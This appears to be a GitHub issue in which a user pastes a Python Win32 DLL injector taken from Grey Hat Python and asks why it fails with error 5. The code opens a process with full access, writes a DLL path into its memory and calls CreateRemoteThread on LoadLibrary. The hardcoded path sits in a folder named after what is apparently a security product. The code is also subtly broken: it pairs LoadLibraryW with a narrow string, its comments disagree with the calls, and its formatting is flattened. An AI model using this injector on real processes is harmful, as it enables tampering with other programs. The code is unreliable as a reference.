!/usr/bin/python

Win32 DLL injector from Grey Hat Python

Minor formatting cleanups done...

import sys from ctypes import *

print "DLL Injector implementation in Python" print "Taken from Grey Hat Python"

''' if (len(sys.argv) != 3): print "Usage: %s " %(sys.argv[0]) print "Eg: %s 1111 C:\test\messagebox.dll" %(sys.argv[0]) sys.exit(0) '''

PAGE_READWRITE = 0x04 PROCESS_ALL_ACCESS = ( 0x00F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 )

kernel32 = windll.kernel32

pid = sys.argv[1]

dll_path = sys.argv[2]

pid = 2312 dll_path = "C:\Users\Administrator\Desktop\pyplugins\ZhudongFangyu\ImgWalk.dll"

dll_len = len(dll_path)

Get handle to process being injected...

h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process: print "[!] Couldn't get handle to PID: %s" %(pid) print "[!] Are you sure %s is a valid PID?" %(pid) sys.exit(0)

Allocate space for DLL path

arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE) print "arg_address: ", arg_address

Write DLL path to allocated space

written = c_int(0) kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written))

Resolve LoadLibraryA Address

h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll") h_loadlib = kernel32.GetProcAddress(h_kernel32, "LoadLibraryW") print "LoadLibraryA: ", h_loadlib

Now we createRemoteThread with entrypoiny set to LoadLibraryA and pointer to DLL path as param

thread_id = c_ulong(0)

if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)): print "[!] Failed to inject DLL, exit...", kernel32.GetLastError() sys.exit(0)

print "[+] Remote Thread with ID 0x%08x created." %(thread_id.value)

when i run it, i get DLL Injector implementation in Python Taken from Grey Hat Python arg_address: 49938432 LoadLibraryA: 1978878195 [!] Failed to inject DLL, exit... 5

i don't know what's wrong, can i get some tips？

infodox / python-dll-injection

[!] Failed to inject DLL, exit... 5 #2